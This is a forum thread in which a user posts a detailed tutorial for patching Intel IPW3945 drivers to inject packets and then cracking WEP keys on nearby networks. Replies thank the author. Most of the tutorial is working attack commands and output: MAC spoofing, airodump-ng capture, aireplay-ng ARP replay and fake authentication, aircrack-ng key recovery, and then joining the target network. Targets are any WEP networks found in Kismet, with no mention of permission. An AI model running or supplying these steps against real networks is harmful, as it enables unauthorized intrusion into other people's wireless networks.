Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: Getting IPW3945 to Inject with IPWRAW, And How to crack WEP Tutorial

  1. #1
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    5

    Default Getting IPW3945 to Inject with IPWRAW, And How to crack WEP Tutorial

    Hey everybody!

    In Backtrack 2, And allmost all other Linux Disto's, Intel Based cards can not inject packets into Wireless networks. This Step-by-Step guide is written for the people that are having trouble getting the injection patches to work. If you follow this from Start To Finish, Im 90% sure your IPW3945 Based card WILL be able to Inject =]

    After having quite a bit of trouble myself, I wrote this tutorial on my own Experience, For anybody that is having trouble with the IPW3945 Cards Injecting. This Tutorial was made Originally made for w4ck1ng.com, but Ive decided to post it on remote-exploit.org forums.
    Please do not rip this and post it on other sites as your own. Don't be harsh on it either, This is the First Tutorial I've Written before. I take no responsibility for anything that may go wrong. =p


    First of all, This tutorial is written for 'BackTrack 2', So please do not post here asking for help using BT3 Beta. Use the Remote Exploit forums for that.

    Contents :

    1. Starting off, Updating Aircrack-NG
    2. Downloading and installing IPWRAW
    3. Loading and Unloading the Drivers
    4. Cracking WEP with our new drivers
    5. Cracking WEP with our new drivers : Part II





    Starting off, Updating Aircrack-NG

    In Backtrack 2 Stable, The IPW3945 Drivers are not loaded by default, So we need to navigate and click on:

    Code:
    Menu -> Backtrack -> Radio Network Analysis -> 80211 -> Misc -> Load IPW3945
    This loads the drivers, every time we startup we have to do this. Later I will introduce the "Alias" command, So that we can easily load and unload all of the drivers.

    Once you have loaded the IPW3945 Drivers, Be sure to connect to a Wireless Network WITH Internet Access by using "Wireless Assistant" Located in:

    Code:
    Menu -> Internet -> Wireless Assistant
    Once we have successfully done this, We need to update our "aircrack-ng" suite. Open a Shell and type:

    Code:
    /pentest/wireless/update-aircrack.sh
    This Step is fairly important, as the updated aircrack suite adds the PTW (-z) Cracking option, Which Cracks WEP keys ALOT faster than aircrack by-itself.



    Downloading and installing IPWRAW


    OK! Now we have successfully updated the aircrack suit, Its time to get down to business and get these drivers working!

    Download the IPWraw drivers from here:

    hxxp://rapidshare.com/files/85198775/ipwraw-ng-2.0.0-10072007.tar.bz2.html

    Save the File in the /tmp directory

    Go back into the shell again, and locate to your tmp dir by typing

    Code:
    cd /tmp
    Then do the following in the shell :

    Extract the File we downloaded:

    Code:
    tar -xjf ipwraw-ng*
    NOTE: The * Means to press <TAB> To compete the filename Automatically

    Change the Current Directory to the one you extracted:

    Code:
    cd ipwraw-ng
    Make the installation:

    Code:
    make
    make install
    make install_ucode
    OPTIONAL:::

    We can now blacklist IPWRAW, So that it does not load on startup, We do this by entering:

    Code:
    echo "blacklist ipwraw" | sudo tee /etc/modprobe.d/ipwraw
    sudo depmod -ae
    NOTE:: If you blacklist IPWRAW, you usually get little warnings when Loading/Unloading Drivers, These are fine.

    EG ::WARNING: /etc/modprobe.d/ipwraw line 1: ignoring bad line starting with 'Blacklist



    Loading and Unloading the Drivers


    We have now finished installing IPWRAW, We should now be able to inject while cracking WEP!~

    Later, I will explain the use of "Alias" commands, Which will help us load and unload the drivers easier. For now we can do this,

    Load the IPWRAW drivers with this command:

    Code:
    /tmp/ipwraw/load
    Warning : This will put your card into monitor mode, you will not be able to access the internet whilst you have the IPWraw Drivers loaded. And you can NOT have both IPW3945 and IPWRAW drivers running at the same time.

    You should now get a message saying something about 'rtap0' being ready, This is a good thing =D

    To UNLOAD the IPWraw drivers, Enter:

    Code:
    /sbin/modprobe -r ipwraw

    And to Reload the IPW3945 Drivers to access the Internet, Type:
    Code:
    /sbin/modprobe ipw3945
    /usr/src/drivers/ipw3945-1.2.0/load

    ...And to Unload the IPW3945 Drivers:

    Code:
    /sbin/modprobe -r ipw3945
    /usr/src/drivers/ipw3945-1.2.0/unload


    Cracking WEP with our new drivers


    The first thing we need to do, Is to edit our kismet.conf file to recognise out new interfaces.
    Do this by typing into a shell :

    Code:
    nano /etc/kismet/kismet.conf

    Scroll all the way to the bottom of the file and enter this for "Source"

    Code:
    source=ipw3945,wifi0,Intel
    Save by pressing "Ctrl + O", Then Enter. Then Exit by pressing "CTRL + X"

    Now we are almost ready to start, First of all we need some information on the Target.

    In the shell, Enter:

    Code:
    kismet
    After a few moments, Kismet should load up, and you should have a Screen with at least one Wireless AP on it, If you don't, You need to find some, because if there is none there, We cant crack anything!

    We now need to select a Network from the list, and note some of its details. See the "W" up the top? This stands for WEP. Each AP will have Y or N, We need to choose one that has a "Y", This means it is using WEP. We should choose a network that does have some packet flow, Because we need to know that we are in a good range of the router.

    Open up a KWrite Document and note down the Name , Channel , And the IP Range of the Target, The IP range may not be there, that is fine.


    Press "Ctrl + C" To shutdown Kismet


    We should now Fake our MAC address, we do this by typing this into a shell:

    Code:
    macchanger -m 00:11:22:33:44:55 wifi0
    Our output should be:
    Code:
    Current MAC: 00:xx:xx:xx:xx:xx (unknown)
    Faked MAC:   00:11:22:33:44:55 (Cimsys Inc)

    Now we must run 'airodump' on rtap0

    Code:
    airodump-ng rtap0
    You should see a few BSSID's etc, We need to find our target, Look at the ESSID and find the target we saw in Kismet, We can see that it is WEP, and we have a bunch of other information about the AP.

    Press "Ctrl + C" To stop airodump, and copy the entire line of your Target into Kwrite eg:


    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:56:B4:6C:CD:92 0 73 20 3 6 54 WEP linksys


    The main thing we need here, Is the Channel Number (6) in this case, and the BSSID.

    Now me must edit our wireless cards by changing some options, With the ones we just gathered. Follow the commands given below:

    Code:
     ifconfig wifi0 down
     #Change to AP BSSID
     nano /sys/class/net/wifi0/device/bssid
     # Change to the channel of the Target AP
     nano /sys/class/net/wifi0/device/channel
     # Change The value from 108 to 2
     nano /sys/class/net/wifi0/device/rate
     ifconfig wifi0 up
    Now we are on the same channel, Etc as our Target.

    Now comes the fun stuff, Actually Getting the WEP key.

    In a shell put:

    Code:
    airodump-ng --channel 6 --write ExPlOiT -b 00:16:B6:6C:CD:92 wifi0
    The dump should save as "ExPlOiT.cap" in "/", the -b Option allows us to only capture data from our Target, And not other AP's


    We now leave that shell open Capturing Data, and open a new shell

    Now run aireplay-ng

    Code:
    aireplay-ng -3 -b <mac address of ap> -h <mac of my interface> wifi0
    E.G aireplay-ng -3 -b 00:16:B6:6C:CD:92 -h 00:11:22:33:44:55 wifi0

    This can tell how many ARP requests we are getting, Leave it running also, and open ANOTHER new shell, This should be our Third Shell.

    We now Assosiate ourselves with the AP!

    First we will lower our rate with our card by doing this:

    Code:
    iwconfig wif0 rate 1M
    Now we wssisiate ourselves with the AP!

    Code:
    aireplay-ng -1 0 -e <Name of Network> -a <BSSID> -h <YOUR MAC> wifi0
    EG. aireplay-ng -1 0 -e Motorola9214 -a 00:16:B6:6C:CD:92 -h 00:11:22:33:44:55 wifi0

    We should get output like this:

    03:35:59 Waiting for beacon frame (BSSID: 00:16:B6:6C:CD:92)
    03:35:59 Sending Authentication Request
    03:35:59 Authentication successful
    03:35:59 Sending Association Request
    03:36:04 Association successfull :-)
    bt /#
    Wait paitently, watching our aireplay window...

    Our "got XXXXX ARP Requests" should start rocketing now. We should wait untill we have captured about ~60,000 , Or about 100,000 for maximal results.

    Once we have reached those marks, Press "CTRL + C" in all Three shells, To stop the process.




    Proceed to Part II!

  2. #2
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    5

    Default

    Part II



    Use one of the shells to run aircrack.

    Code:
    aircrack-ng -z /ExPlOiT-01.cap
    The "Z" option is new in aircrack, This is the reason why we updated the aircrack suite before.

    This is the output!!
    [00:00:00] Tested 80/1400000 keys (got 58674 IVs)

    KB depth byte(vote)
    0 0/ 2 62( 298) 04( 282) 80( 274) 6C( 272) 20( 270) A0( 266)
    1 0/ 1 DE( 340) 6A( 265) C5( 261) 0A( 260) B9( 260) CF( 260)
    2 0/ 1 80( 335) 14( 271) 71( 265) 02( 263) 2E( 263) 65( 262)
    3 2/ 5 C9( 266) 94( 263) 48( 262) 87( 262) F7( 262) 08( 257)
    4 0/ 1 4E( 296) EE( 270) 41( 268) D3( 266) 89( 265) 68( 262)
    5 0/ 1 23( 332) 9B( 271) 47( 267) 77( 264) FF( 263) 54( 262)
    6 0/ 1 BC( 308) C7( 279) 3E( 272) 8D( 270) E4( 267) ED( 264)
    7 0/ 1 C1( 319) 1E( 270) BF( 266) 75( 265) 9C( 265) 94( 261)
    8 0/ 4 A8( 280) F5( 272) 55( 269) FC( 266) F2( 263) 89( 262)
    9 0/ 1 6A( 291) 8F( 268) 9B( 268) DE( 266) B8( 264) 36( 262)
    10 0/ 2 00( 297) E2( 282) C1( 274) 69( 263) D7( 263) 67( 259)
    11 0/ 1 33( 344) 2D( 267) 30( 262) AD( 261) 1A( 258) 68( 258)
    12 0/ 1 93( 298) 6B( 270) F9( 261) 05( 258) B0( 258) 4B( 256)

    >>KEY FOUND! [ 62E:80:88:4E:23:BC:C1:A8:6A:00:33:92 ]<<
    Decrypted correctly: 100%

    We found the key! "62E:80:88:4E:23:BC:C1:A8:6A:00:33:92"


    Now we can connect to the wireless network, remember how I said earlier we were going to make Alias commands? This is the time.

    We are going to make multiple Alias commands, This is all Optional stuff, But It's easier to load and unload the drivers this way.

    Code:
    #Load the IPWRAW Drivers
    alias=rawload"/tmp/ipwraw-ng/load"
    #Unload the IPWRAW drivers
    alias=rawuload"/sbin/modprobe -r ipwraw"
    
    #Load the IPW3945 Drivers Part 1
    alias=3945L1"/sbin/modprobe ipw3945"
    #Load the IPW3945 Drivers Part 2
    alias=3945L2"/usr/src/drivers/ipw3945-1.2.0/load"
    
    
    #Unload the IPW3945 Drivers Part 1
    alias=2945U1"/sbin/modprobe -r ipw3945"
    #Unload the IPW3945 Drivers Part 2
    alias="3945U2/usr/src/drivers/ipw3945-1.2.0/unload"

    After we have done this, We remove the IPWRAW drivers:

    Code:
    rawuload
    And load the IPW3945 Drivers

    Code:
    3945L1
    3945L2
    Now we can use Wireless Assistant or the Shell to connect to the WEP Enabled Wireless Network!

    THE END!!


    Congratulations, Hopefully you now have Installed the IPWRAW Drivers, and Cracked a WEP key!!

    I hope this tutotial helped somebody, I spent quite alot of time on it. I may add some pictures of things eventually..

    Feedback would be appreciated!

    SubJimbo

    If you enjoyed this tutorial, Please Visit w4ck1ng.com

  3. #3
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    We appreciate the time you put into this tutorial however it has been covered at least ten times on this forum.

  4. #4
    Junior Member
    Join Date
    Dec 2007
    Posts
    76

    Default

    Good work, comprehensive info all there. A good structure.
    Pureh@te's right, but i'm sure this will help many still. Which is what it's about in the end. 'eh?

    peace

  5. #5
    Just burned his ISO imported____________'s Avatar
    Join Date
    Jan 2008
    Posts
    15

    Default

    Thanks for the info, it helped me to get my first wep cracked

  6. #6
    Junior Member imported_Delta's Avatar
    Join Date
    Nov 2007
    Posts
    34

    Default

    SubJimbo i give you credit for doing this. sweet tuto no gaps in it! perfect. this is probably the best one ive seen sofar on this forum.
    g00d jo8

    DeLtA
    "Bart, with $10,000, we'd be millionaires! We could buy all kinds of useful things like...LOVE!"
    by, Homer J Simpson:cool:

  7. #7
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    5

    Default

    Thanks Delta, Appreciate it.

    I tryed to make it as complete as I possibly could, And Im sure it covers just about Everything

  8. #8
    Junior Member imported_Delta's Avatar
    Join Date
    Nov 2007
    Posts
    34

    Default

    yep covers it all

    even knowing how it works i learned a little THX!!!



    ^
    __D-E-L-T-A__
    "Bart, with $10,000, we'd be millionaires! We could buy all kinds of useful things like...LOVE!"
    by, Homer J Simpson:cool:

  9. #9
    Junior Member imported_Delta's Avatar
    Join Date
    Nov 2007
    Posts
    34

    Default

    wohhhooww!!!
    i was playing around with my driver and now the ipwraw wont load.
    this is what i did. i removed it and reinstalled it, added it to the blacklist and when i type
    ~#modprobe -r ipw3945
    ~#modprobe ipwraw
    the ipw3945 driver unloads but the ipwraw driver doesnt load!!!! the light stays orange (used to turn blue when successfully loaded)
    when i type in iwconfig the card doesnt show up at all!
    im using ubuntu

    PLZ HELP!!!!
    if you can



    DELTA
    "Bart, with $10,000, we'd be millionaires! We could buy all kinds of useful things like...LOVE!"
    by, Homer J Simpson:cool:

  10. #10
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Quote Originally Posted by Delta View Post
    wohhhooww!!!
    i was playing around with my driver and now the ipwraw wont load.
    this is what i did. i removed it and reinstalled it, added it to the blacklist and when i type
    ~#modprobe -r ipw3945
    ~#modprobe ipwraw
    the ipw3945 driver unloads but the ipwraw driver doesnt load!!!! the light stays orange (used to turn blue when successfully loaded)
    when i type in iwconfig the card doesnt show up at all!
    im using ubuntu

    PLZ HELP!!!!
    if you can



    DELTA
    This is a back track support form not ubuntu.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •